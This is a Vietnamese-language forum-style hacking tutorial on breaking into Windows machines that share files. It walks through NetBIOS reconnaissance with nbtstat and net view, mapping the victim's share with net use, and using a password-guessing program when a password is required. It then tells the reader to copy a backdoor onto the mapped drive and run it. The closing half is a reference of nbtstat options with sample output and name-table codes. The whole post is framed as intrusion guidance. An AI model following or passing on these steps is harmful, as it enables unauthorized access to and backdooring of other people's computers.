Share file thì không cần phải nói ai cũng biết nhưng khi người ta share file là một cơ hội tốt để đột nhập máy tính họ. Những chương trình đột nhập máy tính như backdoor thì tôi không phải giới thiệu các bạn đã biết . Tôi chỉ giới thiệu làm cách nào để chạy backdoor khi có share file .
Một số lệnh trong NetBios cũng rất hữu ích(các bạn tự tìm hiểu lấy) tôi chỉ nêu một số lệnh phục cho việc xem và access
Để lấy thông tin trên máy người share file thì
C:\> nbtstat -a <tên người share file>
-A <nhập IP>
Nó sẽ thông báo những thông tin về máy người này trên mạng
C:\> net view \<tên máy>
Nó sẽ hiển thị những thư mục mà người này share. Lệnh này chỉ có thể hiển thị những thư mục share không ẩn . Còn hiển thị tất cả các share ẩn thì dùng một số chương trình có ở những trang norton.com hay lockdown.com
Khi đã thấy share bạn dùng lệnh sau để tạo một ổ đĩa ảo trên máy mình
C:\> net use <tên ổ địa do mình muốn> : \\<IP>\<sharename>
Khi thực hiện được nó sẽ báo thành công ! Nếu như nó đòi pw khi truy nhập thì phải dùng chương trình dò pass ( bạn tìm trong phần download ).
Khi đã xâm nhập thành công , công việc còn lại chỉ là chép backdoor vào ổ đĩa ảo này và chạy backdoor
Để chạy được backdoor bạn phải chuyển sang ổ đĩa ảo mà bạn đã tạo và chép backdoor lên mà chạy.
-------------------------
Vài options về NBT Viết tắt của NetBIOS over TCP/IP
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
ví dụ cụ thể:
>nbtstat -A 192.168.0.2
connect local area :
Node IpAddress: [192.168.0.2] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
AT-M3 <00> UNIQUE Registered
ATM <00> GROUP Registered
AT-M3 <03> UNIQUE Registered
AT-M3 <20> UNIQUE Registered
ATM <1E> GROUP Registered
ATM <1D> UNIQUE Registered
...<01> GROUP Registered
MAC Address = 00-10-DC-1F-CF-FA
Ý nghĩ của các chứ số nằm <XX>
00: base computernames and workgroups, also in "*" queries
01: master browser, in magic cookie
03: messaging/alerter service; name of logged-in user
20: resource-sharing "server service" name
1B: domain master-browser name
1C: domain controller name
1E: domain/workgroup master browser election announcement [?]